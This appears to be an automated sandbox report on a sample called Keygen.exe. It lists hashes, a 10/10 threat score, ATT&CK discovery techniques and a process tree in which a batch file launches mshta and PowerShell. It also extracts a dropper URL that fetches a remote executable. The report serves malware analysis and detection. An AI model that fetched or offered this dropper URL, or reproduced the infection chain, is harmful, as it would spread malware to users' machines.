38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66

Resubmissions

01/03/2025, 18:58

250301-xmhhrayp15 10

01/03/2025, 18:55

250301-xkqrcaypx7 10

Analysis

max time kernel
854s
max time network
859s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
17/01/2025, 10:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe
Size

849KB
MD5

dbde61502c5c0e17ebc6919f361c32b9
SHA1

189749cf0b66a9f560b68861f98c22cdbcafc566
SHA256

88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b
SHA512

d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb
SSDEEP

24576:uSdQdKdRdOdHdmHBnWs/nROBiGR4+hazer+Vufo/JxBYQ5:hH9DnR1Z+45Ufo/PBL

Score

10^/10

discovery execution motw phishing

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	6112	powershell.exe
11	3872	powershell.exe
13	5960	powershell.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000\Control Panel\International\Geo\Nation	Keygen.exe

Executes dropped EXE 1 IoCs

pid	Process
1936	Keygen.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5980	powershell.exe
6112	powershell.exe
2128	powershell.exe
3872	powershell.exe
5960	powershell.exe
5392	powershell.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
142	ipinfo.io
143	ipinfo.io
155	ipinfo.io

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
455	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\0a4a9750-320c-4958-bddf-e90cbd1d2922.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250117105636.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1120	timeout.exe
4060	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-564748828-2201999071-3764224244-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
6112	powershell.exe
6112	powershell.exe
5980	powershell.exe
5980	powershell.exe
2128	powershell.exe
2128	powershell.exe
3872	powershell.exe
3872	powershell.exe
6112	powershell.exe
5980	powershell.exe
2128	powershell.exe
3872	powershell.exe
5960	powershell.exe
5960	powershell.exe
5392	powershell.exe
5392	powershell.exe
5960	powershell.exe
5392	powershell.exe
4020	msedge.exe
4020	msedge.exe
2060	msedge.exe
2060	msedge.exe
5136	identity_helper.exe
5136	identity_helper.exe
3768	msedge.exe
3768	msedge.exe
6096	msedge.exe
6096	msedge.exe
4820	identity_helper.exe
4820	identity_helper.exe
1220	msedge.exe
1220	msedge.exe
1220	msedge.exe
1220	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	5980	powershell.exe
Token: SeDebugPrivilege	6112	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	5960	powershell.exe
Token: SeDebugPrivilege	5392	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe
1936	Keygen.exe

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
2060	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe
6096	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1936	Keygen.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6092 wrote to memory of 4456	6092	Keygen.exe	81
PID 6092 wrote to memory of 4456	6092	Keygen.exe	81
PID 6092 wrote to memory of 4456	6092	Keygen.exe	81
PID 4456 wrote to memory of 1936	4456	cmd.exe	84
PID 4456 wrote to memory of 1936	4456	cmd.exe	84
PID 4456 wrote to memory of 1936	4456	cmd.exe	84
PID 4456 wrote to memory of 4728	4456	cmd.exe	85
PID 4456 wrote to memory of 4728	4456	cmd.exe	85
PID 4456 wrote to memory of 4728	4456	cmd.exe	85
PID 4456 wrote to memory of 2228	4456	cmd.exe	86
PID 4456 wrote to memory of 2228	4456	cmd.exe	86
PID 4456 wrote to memory of 2228	4456	cmd.exe	86
PID 4456 wrote to memory of 1120	4456	cmd.exe	87
PID 4456 wrote to memory of 1120	4456	cmd.exe	87
PID 4456 wrote to memory of 1120	4456	cmd.exe	87
PID 2228 wrote to memory of 5980	2228	mshta.exe	88
PID 2228 wrote to memory of 5980	2228	mshta.exe	88
PID 2228 wrote to memory of 5980	2228	mshta.exe	88
PID 4728 wrote to memory of 6112	4728	mshta.exe	89
PID 4728 wrote to memory of 6112	4728	mshta.exe	89
PID 4728 wrote to memory of 6112	4728	mshta.exe	89
PID 4456 wrote to memory of 3556	4456	cmd.exe	92
PID 4456 wrote to memory of 3556	4456	cmd.exe	92
PID 4456 wrote to memory of 3556	4456	cmd.exe	92
PID 4456 wrote to memory of 2884	4456	cmd.exe	93
PID 4456 wrote to memory of 2884	4456	cmd.exe	93
PID 4456 wrote to memory of 2884	4456	cmd.exe	93
PID 4456 wrote to memory of 4060	4456	cmd.exe	94
PID 4456 wrote to memory of 4060	4456	cmd.exe	94
PID 4456 wrote to memory of 4060	4456	cmd.exe	94
PID 2884 wrote to memory of 2128	2884	mshta.exe	95
PID 2884 wrote to memory of 2128	2884	mshta.exe	95
PID 2884 wrote to memory of 2128	2884	mshta.exe	95
PID 3556 wrote to memory of 3872	3556	mshta.exe	97
PID 3556 wrote to memory of 3872	3556	mshta.exe	97
PID 3556 wrote to memory of 3872	3556	mshta.exe	97
PID 4456 wrote to memory of 3932	4456	cmd.exe	99
PID 4456 wrote to memory of 3932	4456	cmd.exe	99
PID 4456 wrote to memory of 3932	4456	cmd.exe	99
PID 3932 wrote to memory of 5960	3932	mshta.exe	100
PID 3932 wrote to memory of 5960	3932	mshta.exe	100
PID 3932 wrote to memory of 5960	3932	mshta.exe	100
PID 4456 wrote to memory of 5956	4456	cmd.exe	101
PID 4456 wrote to memory of 5956	4456	cmd.exe	101
PID 4456 wrote to memory of 5956	4456	cmd.exe	101
PID 5956 wrote to memory of 5392	5956	mshta.exe	103
PID 5956 wrote to memory of 5392	5956	mshta.exe	103
PID 5956 wrote to memory of 5392	5956	mshta.exe	103
PID 1936 wrote to memory of 2060	1936	Keygen.exe	107
PID 1936 wrote to memory of 2060	1936	Keygen.exe	107
PID 2060 wrote to memory of 1076	2060	msedge.exe	108
PID 2060 wrote to memory of 1076	2060	msedge.exe	108
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109
PID 2060 wrote to memory of 2508	2060	msedge.exe	109

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E69.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4456
- - C:\Users\Admin\AppData\Local\Temp\6E69.tmp\Keygen.exe
    Keygen.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hetmanrecovery.com/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff8066b46f8,0x7ff8066b4708,0x7ff8066b4718
        5⤵
        
        PID:1076
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
        5⤵
        
        PID:2508
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
        5⤵
        
        PID:1376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
        5⤵
        
        PID:5892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
        5⤵
        
        PID:3068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
        5⤵
        
        PID:2652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        5⤵
        Drops file in Program Files directory
        
        PID:5328
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6b43d5460,0x7ff6b43d5470,0x7ff6b43d5480
        6⤵
        
        PID:4744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
        5⤵
        
        PID:1608
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
        5⤵
        
        PID:1872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
        5⤵
        
        PID:476
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,619926116719481452,16871708747974175966,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
        5⤵
        
        PID:4240
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hetmanrecovery.com/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of SendNotifyMessage
      PID:6096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff8066b46f8,0x7ff8066b4708,0x7ff8066b4718
        5⤵
        
        PID:4072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
        5⤵
        
        PID:4080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
        5⤵
        
        PID:3092
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
        5⤵
        
        PID:5540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
        5⤵
        
        PID:4836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
        5⤵
        
        PID:4500
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
        5⤵
        
        PID:5804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
        5⤵
        
        PID:5808
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
        5⤵
        
        PID:5740
